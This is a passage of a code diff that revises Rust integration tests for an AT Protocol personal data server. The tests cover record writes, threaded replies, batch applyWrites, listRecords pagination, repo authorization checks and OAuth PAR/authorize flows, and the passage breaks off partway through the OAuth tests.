.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 188 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 189 .send() 190 .await 191 .expect("Failed to get updated profile"); ··· 198 let client = client(); 199 let (alice_did, alice_jwt) = setup_new_user("alice-thread").await; 200 let (bob_did, bob_jwt) = setup_new_user("bob-thread").await; 201 + let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await; 202 tokio::time::sleep(Duration::from_millis(100)).await; 203 let reply_collection = "app.bsky.feed.post"; 204 let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis()); 205 let reply_payload = json!({ 206 "repo": bob_did, 207 "collection": reply_collection, ··· 209 "record": { 210 "$type": reply_collection, 211 "text": "This is Bob's reply to Alice", 212 + "createdAt": Utc::now().to_rfc3339(), 213 "reply": { 214 + "root": { "uri": root_uri, "cid": root_cid }, 215 + "parent": { "uri": root_uri, "cid": root_cid } 216 } 217 } 218 }); 219 let reply_res = client 220 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 221 .bearer_auth(&bob_jwt) 222 .json(&reply_payload) 223 .send() ··· 228 let reply_uri = reply_body["uri"].as_str().unwrap(); 229 let reply_cid = reply_body["cid"].as_str().unwrap(); 230 let get_reply_res = client 231 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 232 + .query(&[("repo", bob_did.as_str()), ("collection", reply_collection), ("rkey", reply_rkey.as_str())]) 233 .send() 234 .await 235 .expect("Failed to get reply"); 236 assert_eq!(get_reply_res.status(), StatusCode::OK); 237 let reply_record: Value = get_reply_res.json().await.unwrap(); 238 assert_eq!(reply_record["value"]["reply"]["root"]["uri"], root_uri); 239 tokio::time::sleep(Duration::from_millis(100)).await; 240 let nested_reply_rkey = format!("e2e_nested_reply_{}", Utc::now().timestamp_millis()); 241 let nested_payload = json!({ ··· 247 "text": "Alice replies to Bob's reply", 248 "createdAt": Utc::now().to_rfc3339(), 249 "reply": { 250 + "root": { "uri": root_uri, "cid": root_cid }, 251 + "parent": { "uri": reply_uri, "cid": reply_cid } 252 } 253 } 254 }); 255 let nested_res = client 256 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 257 .bearer_auth(&alice_jwt) 258 .json(&nested_payload) 259 .send() 260 .await 261 .expect("Failed to create nested reply"); 262 + assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 263 } 264 265 #[tokio::test] 266 + async fn test_authorization_protects_repos() { 267 let client = client(); 268 + let (alice_did, alice_jwt) = setup_new_user("alice-auth").await; 269 let (_bob_did, bob_jwt) = setup_new_user("bob-auth").await; 270 + let (post_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's post").await; 271 + let post_rkey = post_uri.split('/').last().unwrap(); 272 let post_payload = json!({ 273 "repo": alice_did, 274 "collection": "app.bsky.feed.post", 275 "rkey": "unauthorized-post", 276 + "record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() } 277 }); 278 + let write_res = client 279 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 280 .bearer_auth(&bob_jwt) 281 .json(&post_payload) 282 .send() 283 .await 284 .expect("Failed to send request"); 285 + assert!(write_res.status() == StatusCode::FORBIDDEN || write_res.status() == StatusCode::UNAUTHORIZED, 286 + "Expected 403/401 for writing to another user's repo, got {}", write_res.status()); 287 + let delete_payload = json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey }); 288 + let delete_res = client 289 + .post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await)) 290 .bearer_auth(&bob_jwt) 291 .json(&delete_payload) 292 .send() 293 .await 294 .expect("Failed to send request"); 295 + assert!(delete_res.status() == StatusCode::FORBIDDEN || delete_res.status() == StatusCode::UNAUTHORIZED, 296 + "Expected 403/401 for deleting another user's record, got {}", delete_res.status()); 297 let get_res = client 298 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 299 + .query(&[("repo", alice_did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", post_rkey)]) 300 .send() 301 .await 302 .expect("Failed to verify record exists"); 303 + assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 304 } 305 306 #[tokio::test] 307 + async fn test_apply_writes_batch() { 308 let client = client(); 309 let (did, jwt) = setup_new_user("apply-writes-batch").await; 310 let now = Utc::now().to_rfc3339(); 311 let writes_payload = json!({ 312 "repo": did, 313 "writes": [ 314 + { "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.feed.post", "rkey": "batch-post-1", "value": { "$type": "app.bsky.feed.post", "text": "First batch post", "createdAt": now } }, 315 + { "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.feed.post", "rkey": "batch-post-2", "value": { "$type": "app.bsky.feed.post", "text": "Second batch post", "createdAt": now } }, 316 + { "$type": "com.atproto.repo.applyWrites#create", "collection": "app.bsky.actor.profile", "rkey": "self", "value": { "$type": "app.bsky.actor.profile", "displayName": "Batch User" } } 317 ] 318 }); 319 let apply_res = client 320 + .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 321 .bearer_auth(&jwt) 322 .json(&writes_payload) 323 .send() ··· 325 .expect("Failed to apply writes"); 326 assert_eq!(apply_res.status(), StatusCode::OK); 327 let get_post1 = client 328 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 329 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 330 + .send().await.expect("Failed to get post 1"); 331 assert_eq!(get_post1.status(), StatusCode::OK); 332 let post1_body: Value = get_post1.json().await.unwrap(); 333 assert_eq!(post1_body["value"]["text"], "First batch post"); 334 let get_post2 = client 335 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 336 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-2")]) 337 + .send().await.expect("Failed to get post 2"); 338 assert_eq!(get_post2.status(), StatusCode::OK); 339 let get_profile = client 340 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 341 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 342 + .send().await.expect("Failed to get profile"); 343 let profile_body: Value = get_profile.json().await.unwrap(); 344 assert_eq!(profile_body["value"]["displayName"], "Batch User"); 345 let update_writes = json!({ 346 "repo": did, 347 "writes": [ 348 + { "$type": "com.atproto.repo.applyWrites#update", "collection": "app.bsky.actor.profile", "rkey": "self", "value": { "$type": "app.bsky.actor.profile", "displayName": "Updated Batch User" } }, 349 + { "$type": "com.atproto.repo.applyWrites#delete", "collection": "app.bsky.feed.post", "rkey": "batch-post-1" } 350 ] 351 }); 352 let update_res = client 353 + .post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await)) 354 .bearer_auth(&jwt) 355 .json(&update_writes) 356 .send() ··· 358 .expect("Failed to apply update writes"); 359 assert_eq!(update_res.status(), StatusCode::OK); 360 let get_updated_profile = client 361 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 362 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")]) 363 + .send().await.expect("Failed to get updated profile"); 364 let updated_profile: Value = get_updated_profile.json().await.unwrap(); 365 + assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User"); 366 let get_deleted_post = client 367 + .get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await)) 368 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")]) 369 + .send().await.expect("Failed to check deleted post"); 370 + assert_eq!(get_deleted_post.status(), StatusCode::NOT_FOUND, "Batch-deleted post should be gone"); 371 } 372 373 + async fn create_post_with_rkey(client: &reqwest::Client, did: &str, jwt: &str, rkey: &str, text: &str) -> (String, String) { 374 let payload = json!({ 375 + "repo": did, "collection": "app.bsky.feed.post", "rkey": rkey, 376 + "record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() } 377 }); 378 let res = client 379 + .post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await)) 380 .bearer_auth(jwt) 381 .json(&payload) 382 .send() ··· 384 .expect("Failed to create record"); 385 assert_eq!(res.status(), StatusCode::OK); 386 let body: Value = res.json().await.unwrap(); 387 + (body["uri"].as_str().unwrap().to_string(), body["cid"].as_str().unwrap().to_string()) 388 } 389 390 #[tokio::test] 391 + async fn test_list_records_comprehensive() { 392 let client = client(); 393 + let (did, jwt) = setup_new_user("list-records-test").await; 394 for i in 0..5 { 395 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 396 tokio::time::sleep(Duration::from_millis(50)).await; 397 } 398 let res = client 399 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 400 .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")]) 401 + .send().await.expect("Failed to list records"); 402 assert_eq!(res.status(), StatusCode::OK); 403 let body: Value = res.json().await.unwrap(); 404 let records = body["records"].as_array().unwrap(); 405 + assert_eq!(records.len(), 5); 406 + let rkeys: Vec<&str> = records.iter().map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 407 + assert_eq!(rkeys, vec!["post04", "post03", "post02", "post01", "post00"], "Default order should be DESC"); 408 for record in records { 409 + assert!(record["uri"].is_string()); 410 + assert!(record["cid"].is_string()); 411 + assert!(record["cid"].as_str().unwrap().starts_with("bafy")); 412 + assert!(record["value"].is_object()); 413 } 414 + let rev_res = client 415 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 416 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("reverse", "true")]) 417 + .send().await.expect("Failed to list records reverse"); 418 + let rev_body: Value = rev_res.json().await.unwrap(); 419 + let rev_rkeys: Vec<&str> = rev_body["records"].as_array().unwrap().iter() 420 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 421 + assert_eq!(rev_rkeys, vec!["post00", "post01", "post02", "post03", "post04"], "reverse=true should give ASC"); 422 + let page1 = client 423 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 424 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2")]) 425 + .send().await.expect("Failed to list page 1"); 426 + let page1_body: Value = page1.json().await.unwrap(); 427 + let page1_records = page1_body["records"].as_array().unwrap(); 428 + assert_eq!(page1_records.len(), 2); 429 + let cursor = page1_body["cursor"].as_str().expect("Should have cursor"); 430 + let page2 = client 431 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 432 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "2"), ("cursor", cursor)]) 433 + .send().await.expect("Failed to list page 2"); 434 + let page2_body: Value = page2.json().await.unwrap(); 435 + let page2_records = page2_body["records"].as_array().unwrap(); 436 + assert_eq!(page2_records.len(), 2); 437 + let all_uris: Vec<&str> = page1_records.iter().chain(page2_records.iter()) 438 + .map(|r| r["uri"].as_str().unwrap()).collect(); 439 + let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 440 + assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 441 + let range_res = client 442 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 443 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), 444 + ("rkeyStart", "post01"), ("rkeyEnd", "post03"), ("reverse", "true")]) 445 + .send().await.expect("Failed to list range"); 446 + let range_body: Value = range_res.json().await.unwrap(); 447 + let range_rkeys: Vec<&str> = range_body["records"].as_array().unwrap().iter() 448 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()).collect(); 449 + for rkey in &range_rkeys { 450 + assert!(*rkey >= "post01" && *rkey <= "post03", "Range should be inclusive"); 451 } 452 + let limit_res = client 453 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 454 + .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("limit", "1000")]) 455 + .send().await.expect("Failed with high limit"); 456 + let limit_body: Value = limit_res.json().await.unwrap(); 457 + assert!(limit_body["records"].as_array().unwrap().len() <= 100, "Limit should be clamped to max 100"); 458 + let not_found_res = client 459 + .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await)) 460 + .query(&[("repo", "did:plc:nonexistent12345"), ("collection", "app.bsky.feed.post")]) 461 + .send().await.expect("Failed with nonexistent repo"); 462 + assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 463 }
+1 -199
tests/lifecycle_social.rs
··· 4 use common::*; 5 use helpers::*; 6 use reqwest::StatusCode; 7 - use serde_json::{Value, json}; 8 - use std::time::Duration; 9 - 10 - #[tokio::test] 11 - async fn test_social_flow_lifecycle() { 12 - let client = client(); 13 - let (alice_did, alice_jwt) = setup_new_user("alice-social").await; 14 - let (bob_did, bob_jwt) = setup_new_user("bob-social").await; 15 - let (post1_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's first post!").await; 16 - create_follow(&client, &bob_did, &bob_jwt, &alice_did).await; 17 - tokio::time::sleep(Duration::from_secs(1)).await; 18 - let timeline_res_1 = client 19 - .get(format!( 20 - "{}/xrpc/app.bsky.feed.getTimeline", 21 - base_url().await 22 - )) 23 - .bearer_auth(&bob_jwt) 24 - .send() 25 - .await 26 - .expect("Failed to get timeline (1)"); 27 - assert_eq!( 28 - timeline_res_1.status(), 29 - reqwest::StatusCode::OK, 30 - "Failed to get timeline (1)" 31 - ); 32 - let timeline_body_1: Value = timeline_res_1.json().await.expect("Timeline (1) not JSON"); 33 - let feed_1 = timeline_body_1["feed"].as_array().unwrap(); 34 - assert_eq!(feed_1.len(), 1, "Timeline should have 1 post"); 35 - assert_eq!( 36 - feed_1[0]["post"]["uri"], post1_uri, 37 - "Post URI mismatch in timeline (1)" 38 - ); 39 - let (post2_uri, _) = create_post( 40 - &client, 41 - &alice_did, 42 - &alice_jwt, 43 - "Alice's second post, so exciting!", 44 - ) 45 - .await; 46 - tokio::time::sleep(Duration::from_secs(1)).await; 47 - let timeline_res_2 = client 48 - .get(format!( 49 - "{}/xrpc/app.bsky.feed.getTimeline", 50 - base_url().await 51 - )) 52 - .bearer_auth(&bob_jwt) 53 - .send() 54 - .await 55 - .expect("Failed to get timeline (2)"); 56 - assert_eq!( 57 - timeline_res_2.status(), 58 - reqwest::StatusCode::OK, 59 - "Failed to get timeline (2)" 60 - ); 61 - let timeline_body_2: Value = timeline_res_2.json().await.expect("Timeline (2) not JSON"); 62 - let feed_2 = timeline_body_2["feed"].as_array().unwrap(); 63 - assert_eq!(feed_2.len(), 2, "Timeline should have 2 posts"); 64 - assert_eq!( 65 - feed_2[0]["post"]["uri"], post2_uri, 66 - "Post 2 should be first" 67 - ); 68 - assert_eq!( 69 - feed_2[1]["post"]["uri"], post1_uri, 70 - "Post 1 should be second" 71 - ); 72 - let delete_payload = json!({ 73 - "repo": alice_did, 74 - "collection": "app.bsky.feed.post", 75 - "rkey": post1_uri.split('/').last().unwrap() 76 - }); 77 - let delete_res = client 78 - .post(format!( 79 - "{}/xrpc/com.atproto.repo.deleteRecord", 80 - base_url().await 81 - )) 82 - .bearer_auth(&alice_jwt) 83 - .json(&delete_payload) 84 - .send() 85 - .await 86 - .expect("Failed to send delete request"); 87 - assert_eq!( 88 - delete_res.status(), 89 - reqwest::StatusCode::OK, 90 - "Failed to delete record" 91 - ); 92 - tokio::time::sleep(Duration::from_secs(1)).await; 93 - let timeline_res_3 = client 94 - .get(format!( 95 - "{}/xrpc/app.bsky.feed.getTimeline", 96 - base_url().await 97 - )) 98 - .bearer_auth(&bob_jwt) 99 - .send() 100 - .await 101 - .expect("Failed to get timeline (3)"); 102 - assert_eq!( 103 - timeline_res_3.status(), 104 - reqwest::StatusCode::OK, 105 - "Failed to get timeline (3)" 106 - ); 107 - let timeline_body_3: Value = timeline_res_3.json().await.expect("Timeline (3) not JSON"); 108 - let feed_3 = timeline_body_3["feed"].as_array().unwrap(); 109 - assert_eq!(feed_3.len(), 1, "Timeline should have 1 post after delete"); 110 - assert_eq!( 111 - feed_3[0]["post"]["uri"], post2_uri, 112 - "Only post 2 should remain" 113 - ); 114 - } 115 116 #[tokio::test] 117 async fn test_like_lifecycle() { ··· 275 StatusCode::NOT_FOUND, 276 "Follow should be deleted" 277 ); 278 - } 279 - 280 - #[tokio::test] 281 - async fn test_timeline_after_unfollow() { 282 - let client = client(); 283 - let (alice_did, alice_jwt) = setup_new_user("alice-tl-unfollow").await; 284 - let (bob_did, bob_jwt) = setup_new_user("bob-tl-unfollow").await; 285 - let (follow_uri, _) = create_follow(&client, &bob_did, &bob_jwt, &alice_did).await; 286 - create_post(&client, &alice_did, &alice_jwt, "Post while following").await; 287 - tokio::time::sleep(Duration::from_secs(1)).await; 288 - let timeline_res = client 289 - .get(format!( 290 - "{}/xrpc/app.bsky.feed.getTimeline", 291 - base_url().await 292 - )) 293 - .bearer_auth(&bob_jwt) 294 - .send() 295 - .await 296 - .expect("Failed to get timeline"); 297 - assert_eq!(timeline_res.status(), StatusCode::OK); 298 - let timeline_body: Value = timeline_res.json().await.unwrap(); 299 - let feed = timeline_body["feed"].as_array().unwrap(); 300 - assert_eq!(feed.len(), 1, "Should see 1 post from Alice"); 301 - let follow_rkey = follow_uri.split('/').last().unwrap(); 302 - let unfollow_payload = json!({ 303 - "repo": bob_did, 304 - "collection": "app.bsky.graph.follow", 305 - "rkey": follow_rkey 306 - }); 307 - client 308 - .post(format!( 309 - "{}/xrpc/com.atproto.repo.deleteRecord", 310 - base_url().await 311 - )) 312 - .bearer_auth(&bob_jwt) 313 - .json(&unfollow_payload) 314 - .send() 315 - .await 316 - .expect("Failed to unfollow"); 317 - tokio::time::sleep(Duration::from_secs(1)).await; 318 - let timeline_after_res = client 319 - .get(format!( 320 - "{}/xrpc/app.bsky.feed.getTimeline", 321 - base_url().await 322 - )) 323 - .bearer_auth(&bob_jwt) 324 - .send() 325 - .await 326 - .expect("Failed to get timeline after unfollow"); 327 - assert_eq!(timeline_after_res.status(), StatusCode::OK); 328 - let timeline_after: Value = timeline_after_res.json().await.unwrap(); 329 - let feed_after = timeline_after["feed"].as_array().unwrap(); 330 - assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing"); 331 - } 332 - 333 - #[tokio::test] 334 - async fn test_mutual_follow_lifecycle() { 335 - let client = client(); 336 - let (alice_did, alice_jwt) = setup_new_user("alice-mutual").await; 337 - let (bob_did, bob_jwt) = setup_new_user("bob-mutual").await; 338 - create_follow(&client, &alice_did, &alice_jwt, &bob_did).await; 339 - create_follow(&client, &bob_did, &bob_jwt, &alice_did).await; 340 - create_post(&client, &alice_did, &alice_jwt, "Alice's post for mutual").await; 341 - create_post(&client, &bob_did, &bob_jwt, "Bob's post for mutual").await; 342 - tokio::time::sleep(Duration::from_secs(1)).await; 343 - let alice_timeline_res = client 344 - .get(format!( 345 - "{}/xrpc/app.bsky.feed.getTimeline", 346 - base_url().await 347 - )) 348 - .bearer_auth(&alice_jwt) 349 - .send() 350 - .await 351 - .expect("Failed to get Alice's timeline"); 352 - assert_eq!(alice_timeline_res.status(), StatusCode::OK); 353 - let alice_tl: Value = alice_timeline_res.json().await.unwrap(); 354 - let alice_feed = alice_tl["feed"].as_array().unwrap(); 355 - assert_eq!(alice_feed.len(), 1, "Alice should see Bob's 1 post"); 356 - let bob_timeline_res = client 357 - .get(format!( 358 - "{}/xrpc/app.bsky.feed.getTimeline", 359 - base_url().await 360 - )) 361 - .bearer_auth(&bob_jwt) 362 - .send() 363 - .await 364 - .expect("Failed to get Bob's timeline"); 365 - assert_eq!(bob_timeline_res.status(), StatusCode::OK); 366 - let bob_tl: Value = bob_timeline_res.json().await.unwrap(); 367 - let bob_feed = bob_tl["feed"].as_array().unwrap(); 368 - assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post"); 369 } 370 371 #[tokio::test]
··· 4 use common::*; 5 use helpers::*; 6 use reqwest::StatusCode; 7 + use serde_json::{json, Value}; 8 9 #[tokio::test] 10 async fn test_like_lifecycle() { ··· 168 StatusCode::NOT_FOUND, 169 "Follow should be deleted" 170 ); 171 } 172 173 #[tokio::test]
+243 -1299
tests/oauth.rs
··· 2 mod helpers; 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 use chrono::Utc; 5 - use common::{base_url, client, create_account_and_login}; 6 use reqwest::{StatusCode, redirect}; 7 use serde_json::{Value, json}; 8 use sha2::{Digest, Sha256}; ··· 10 use wiremock::{Mock, MockServer, ResponseTemplate}; 11 12 fn no_redirect_client() -> reqwest::Client { 13 - reqwest::Client::builder() 14 - .redirect(redirect::Policy::none()) 15 - .build() 16 - .unwrap() 17 } 18 19 fn generate_pkce() -> (String, String) { ··· 21 let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes); 22 let mut hasher = Sha256::new(); 23 hasher.update(code_verifier.as_bytes()); 24 - let hash = hasher.finalize(); 25 - let code_challenge = URL_SAFE_NO_PAD.encode(&hash); 26 (code_verifier, code_challenge) 27 } 28 ··· 45 .await; 46 mock_server 47 } 48 - #[allow(dead_code)] 49 - async fn setup_mock_dpop_client(redirect_uri: &str) -> MockServer { 50 - let mock_server = MockServer::start().await; 51 - let client_id = mock_server.uri(); 52 - let metadata = json!({ 53 - "client_id": client_id, 54 - "client_name": "DPoP Test Client", 55 - "redirect_uris": [redirect_uri], 56 - "grant_types": ["authorization_code", "refresh_token"], 57 - "response_types": ["code"], 58 - "token_endpoint_auth_method": "none", 59 - "dpop_bound_access_tokens": true 60 - }); 61 - Mock::given(method("GET")) 62 - .and(path("/")) 63 - .respond_with(ResponseTemplate::new(200).set_body_json(metadata)) 64 - .mount(&mock_server) 65 - .await; 66 - mock_server 67 - } 68 #[tokio::test] 69 - async fn test_oauth_protected_resource_metadata() { 70 let url = base_url().await; 71 let client = client(); 72 - let res = client 73 - .get(format!("{}/.well-known/oauth-protected-resource", url)) 74 - .send() 75 - .await 76 - .expect("Failed to fetch protected resource metadata"); 77 - assert_eq!(res.status(), StatusCode::OK); 78 - let body: Value = res.json().await.expect("Invalid JSON"); 79 - assert!(body["resource"].is_string()); 80 - assert!(body["authorization_servers"].is_array()); 81 - assert!(body["bearer_methods_supported"].is_array()); 82 - let bearer_methods = body["bearer_methods_supported"].as_array().unwrap(); 83 - assert!(bearer_methods.contains(&json!("header"))); 84 } 85 #[tokio::test] 86 - async fn test_oauth_authorization_server_metadata() { 87 - let url = base_url().await; 88 - let client = client(); 89 - let res = client 90 - .get(format!("{}/.well-known/oauth-authorization-server", url)) 91 - .send() 92 - .await 93 - .expect("Failed to fetch authorization server metadata"); 94 - assert_eq!(res.status(), StatusCode::OK); 95 - let body: Value = res.json().await.expect("Invalid JSON"); 96 - assert!(body["issuer"].is_string()); 97 - assert!(body["authorization_endpoint"].is_string()); 98 - assert!(body["token_endpoint"].is_string()); 99 - assert!(body["jwks_uri"].is_string()); 100 - let response_types = body["response_types_supported"].as_array().unwrap(); 101 - assert!(response_types.contains(&json!("code"))); 102 - let grant_types = body["grant_types_supported"].as_array().unwrap(); 103 - assert!(grant_types.contains(&json!("authorization_code"))); 104 - assert!(grant_types.contains(&json!("refresh_token"))); 105 - let code_challenge_methods = body["code_challenge_methods_supported"].as_array().unwrap(); 106 - assert!(code_challenge_methods.contains(&json!("S256"))); 107 - assert_eq!(body["require_pushed_authorization_requests"], json!(true)); 108 - let dpop_algs = body["dpop_signing_alg_values_supported"] 109 - .as_array() 110 - .unwrap(); 111 - assert!(dpop_algs.contains(&json!("ES256"))); 112 - } 113 - #[tokio::test] 114 - async fn test_oauth_jwks_endpoint() { 115 - let url = base_url().await; 116 - let client = client(); 117 - let res = client 118 - .get(format!("{}/oauth/jwks", url)) 119 - .send() 120 - .await 121 - .expect("Failed to fetch JWKS"); 122 - assert_eq!(res.status(), StatusCode::OK); 123 - let body: Value = res.json().await.expect("Invalid JSON"); 124 - assert!(body["keys"].is_array()); 125 - } 126 - #[tokio::test] 127 - async fn test_par_success() { 128 - let url = base_url().await; 129 - let client = client(); 130 - let redirect_uri = "https://example.com/callback"; 131 - let mock_client = setup_mock_client_metadata(redirect_uri).await; 132 - let client_id = mock_client.uri(); 133 - let (_code_verifier, code_challenge) = generate_pkce(); 134 - let res = client 135 - .post(format!("{}/oauth/par", url)) 136 - .form(&[ 137 - ("response_type", "code"), 138 - ("client_id", &client_id), 139 - ("redirect_uri", redirect_uri), 140 - ("code_challenge", &code_challenge), 141 - ("code_challenge_method", "S256"), 142 - ("scope", "atproto"), 143 - ("state", "test-state-123"), 144 - ]) 145 - .send() 146 - .await 147 - .expect("Failed to send PAR request"); 148 - assert_eq!( 149 - res.status(), 150 - StatusCode::CREATED, 151 - "PAR should succeed: {:?}", 152 - res.text().await 153 - ); 154 - let body: Value = client 155 - .post(format!("{}/oauth/par", url)) 156 - .form(&[ 157 - ("response_type", "code"), 158 - ("client_id", &client_id), 159 - ("redirect_uri", redirect_uri), 160 - ("code_challenge", &code_challenge), 161 - ("code_challenge_method", "S256"), 162 - ("scope", "atproto"), 163 - ("state", "test-state-123"), 164 - ]) 165 - .send() 166 - .await 167 - .unwrap() 168 - .json() 169 - .await 170 - .expect("Invalid JSON"); 171 - assert!(body["request_uri"].is_string()); 172 - assert!(body["expires_in"].is_number()); 173 - let request_uri = body["request_uri"].as_str().unwrap(); 174 - assert!(request_uri.starts_with("urn:ietf:params:oauth:request_uri:")); 175 - } 176 - #[tokio::test] 177 - async fn test_authorize_get_with_valid_request_uri() { 178 let url = base_url().await; 179 let client = client(); 180 let redirect_uri = "https://example.com/callback"; ··· 183 let (_, code_challenge) = generate_pkce(); 184 let par_res = client 185 .post(format!("{}/oauth/par", url)) 186 - .form(&[ 187 - ("response_type", "code"), 188 - ("client_id", &client_id), 189 - ("redirect_uri", redirect_uri), 190 - ("code_challenge", &code_challenge), 191 - ("code_challenge_method", "S256"), 192 - ("scope", "atproto"), 193 - ("state", "test-state"), 194 - ]) 195 - .send() 196 - .await 197 - .expect("PAR failed"); 198 - let par_body: Value = par_res.json().await.expect("Invalid PAR JSON"); 199 let request_uri = par_body["request_uri"].as_str().unwrap(); 200 let auth_res = client 201 .get(format!("{}/oauth/authorize", url)) 202 .header("Accept", "application/json") 203 .query(&[("request_uri", request_uri)]) 204 - .send() 205 - .await 206 - .expect("Authorize GET failed"); 207 assert_eq!(auth_res.status(), StatusCode::OK); 208 - let auth_body: Value = auth_res.json().await.expect("Invalid auth JSON"); 209 assert_eq!(auth_body["client_id"], client_id); 210 assert_eq!(auth_body["redirect_uri"], redirect_uri); 211 assert_eq!(auth_body["scope"], "atproto"); 212 - assert_eq!(auth_body["state"], "test-state"); 213 - } 214 - #[tokio::test] 215 - async fn test_authorize_rejects_invalid_request_uri() { 216 - let url = base_url().await; 217 - let client = client(); 218 - let res = client 219 .get(format!("{}/oauth/authorize", url)) 220 .header("Accept", "application/json") 221 - .query(&[( 222 - "request_uri", 223 - "urn:ietf:params:oauth:request_uri:nonexistent", 224 - )]) 225 - .send() 226 - .await 227 - .expect("Request failed"); 228 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 229 - let body: Value = res.json().await.expect("Invalid JSON"); 230 - assert_eq!(body["error"], "invalid_request"); 231 } 232 #[tokio::test] 233 - async fn test_authorize_requires_request_uri() { 234 - let url = base_url().await; 235 - let client = client(); 236 - let res = client 237 - .get(format!("{}/oauth/authorize", url)) 238 - .send() 239 - .await 240 - .expect("Request failed"); 241 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 242 - } 243 - #[tokio::test] 244 - async fn test_full_oauth_flow_without_dpop() { 245 let url = base_url().await; 246 let http_client = client(); 247 - let (_, _user_did) = create_account_and_login(&http_client).await; 248 let ts = Utc::now().timestamp_millis(); 249 let handle = format!("oauth-test-{}", ts); 250 let email = format!("oauth-test-{}@example.com", ts); 251 let password = "oauth-test-password"; 252 let create_res = http_client 253 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 254 - .json(&json!({ 255 - "handle": handle, 256 - "email": email, 257 - "password": password 258 - })) 259 - .send() 260 - .await 261 - .expect("Account creation failed"); 262 assert_eq!(create_res.status(), StatusCode::OK); 263 let account: Value = create_res.json().await.unwrap(); 264 let user_did = account["did"].as_str().unwrap(); ··· 269 let state = format!("state-{}", ts); 270 let par_res = http_client 271 .post(format!("{}/oauth/par", url)) 272 - .form(&[ 273 - ("response_type", "code"), 274 - ("client_id", &client_id), 275 - ("redirect_uri", redirect_uri), 276 - ("code_challenge", &code_challenge), 277 - ("code_challenge_method", "S256"), 278 - ("scope", "atproto"), 279 - ("state", &state), 280 - ]) 281 - .send() 282 - .await 283 - .expect("PAR failed"); 284 - let par_status = par_res.status(); 285 - let par_text = par_res.text().await.unwrap_or_default(); 286 - if par_status != StatusCode::OK && par_status != StatusCode::CREATED { 287 - panic!("PAR failed with status {}: {}", par_status, par_text); 288 - } 289 - let par_body: Value = serde_json::from_str(&par_text).unwrap(); 290 let request_uri = par_body["request_uri"].as_str().unwrap(); 291 let auth_client = no_redirect_client(); 292 let auth_res = auth_client 293 .post(format!("{}/oauth/authorize", url)) 294 - .form(&[ 295 - ("request_uri", request_uri), 296 - ("username", &handle), 297 - ("password", password), 298 - ("remember_device", "false"), 299 - ]) 300 - .send() 301 - .await 302 - .expect("Authorize POST failed"); 303 - let auth_status = auth_res.status(); 304 - if auth_status != StatusCode::TEMPORARY_REDIRECT 305 - && auth_status != 